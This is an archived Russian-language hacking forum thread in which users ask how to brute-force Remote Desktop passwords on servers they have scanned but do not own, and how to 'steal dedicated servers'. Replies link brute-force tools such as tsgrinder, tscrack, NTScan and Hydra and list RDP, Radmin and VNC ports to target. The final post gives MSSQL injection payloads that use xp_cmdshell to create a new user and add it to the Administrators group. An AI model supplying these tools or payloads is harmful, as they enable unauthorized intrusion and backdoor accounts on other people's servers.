PDA

Просмотр полной версии : Подбор пароля к Remote Desktop Connection


infothief
06.10.2006, 00:08
У меня вопросик такой, есть ли прога которая подбирает пароли к Remote Desktop Connection протоколу это порт 3389.

Чё то везде смотрел и не мог найти даже в книжках такой утилиты не видел.

П.С. Недвно ИП просканил и там этот порт открыт причём я спокойно подключился через mstsc :D вот тока пароля не знаю...

fen
06.10.2006, 15:57
там же указаны Параметры входа:
1) Компьютер (имя компа или ip-адрес ввести)
2) Логин пользователя удаленого компьютера
3) Пасс пользователя

То есть тебе надо подбирать пароль к компьютеру (вернее подбирать к логину с админ правами), к каторому ты будешь подключаться...

Element
06.10.2006, 17:50
Было видео по подбору пароля, ищи там

naqnaq
23.10.2006, 20:36
tsgrinder-2.03 >> http://examples.oreilly.com/networksa/tools/tsgrinder-2.03.zip
Для работы нужен модифицированный Terminal Server Client aka roboclient >>
http://www.securitylab.ru/bitrix/exturl.php?goto=ftp%3A%2F%2Fftp.microsoft.com%2FRe sKit%2Fwin2000%2Froboclient.zip

tscrack 2.0.55 // 2.1 >> офф сайт разработчиков мерт. ищи


Видео с демонстрацией доступно на milw0rme >>
http://str0ke213.tradebit.com/pub/8/38.flv

Aerot1smo
03.03.2007, 13:04
а как через гидру бритить порт 3389?

Stream[kz]
05.01.2008, 03:42
У меня такой вопрос есть кроме нт скан какой ещё по словорям и диапозонам брутит а то этот тока пароль по словарю и один айпи -(

Chuck
05.01.2008, 14:46
Как угнать дэд? KPOT_f!nd описал уже.
Конечно, самый лёгкий способ просканить на наличие открытых портов и пробовать коннектиться без пасса, но получается это очень редко. На ачате висит статья крота. более чем понятно.

-=lebed=-
05.01.2008, 15:13
По умолчанию задана политика безопасности (имхо три или 5 неправильных вводов пароля и в баню, так что брутт, имхо не актуален...)

Mo4x
05.01.2008, 18:14
Tiler2k
Чтоб не искали долго


Статия про брут Dedicated Server через NTScan на портах 3389,4899. (https://forum.antichat.ru/showpost.php?p=236355&postcount=2)

3389 - удаленный рабочий стол
4899 - радмин
5900 - брут на VNC прочетай . (http://forum.asechka.ru/showpost.php?p=293872&postcount=1)

Кстати видел пост KPOT_find на асечке.ру про добычу дедов через MS SQL тут (http://forum.asechka.ru/showpost.php?p=328375&postcount=77)
Кто то знает как это делать ?

ven0m
05.01.2008, 18:25
Ставь unecs!

aka PSIH
05.01.2008, 18:49
Кстати видел пост KPOT_find на асечке.ру про добычу дедов через MS SQL тут
Кто то знает как это делать ?
Есть mssql injection через которые можно выполнять команды на сервере,(Нужно чтоб пользователь БД был sa), если у тебя есть такая инъекция, просто выполняешь команды:
;exec master..xp_cmdshell 'net user Username Password /add';--
;exec master..xp_cmdshell 'net localgroup Administrators Username /add';--

на ачате есть видео как это сделать
http://video.antichat.ru/file229.html

p.s: думаю KPOT_find про такой способ говорил... ;)